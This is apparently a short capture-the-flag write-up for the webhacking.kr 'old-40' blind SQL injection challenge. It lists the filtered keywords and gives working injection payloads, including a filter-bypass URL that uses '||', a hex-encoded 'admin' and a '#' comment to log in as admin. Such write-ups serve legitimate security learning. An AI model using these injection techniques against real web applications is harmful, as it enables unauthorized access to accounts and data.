old-40 -- SQLi (Blind)

URL: https://webhacking.kr/challenge/web-29/arrow-up-right

old-40.png

Upon submitting the request we can see params in URL: https://webhacking.kr/challenge/web-29/?no=1&id=guest&pw=guestarrow-up-right

old-40-1.png

no with payload 1' OR 1=1 -- - returns access denied, probably all 3 variables need to be satisfied for logon.

So AND, OR, SELECT, --, quotes are blocked and can't use them. We can use || OR operator and add another condition, luckily # comment works.

old-40-2.png

https://webhacking.kr/challenge/web-29/?no=2||id=0x61646D696E%23&id=admin&pw=adminarrow-up-right

old-40-4.png
old-40-3.png

Last updated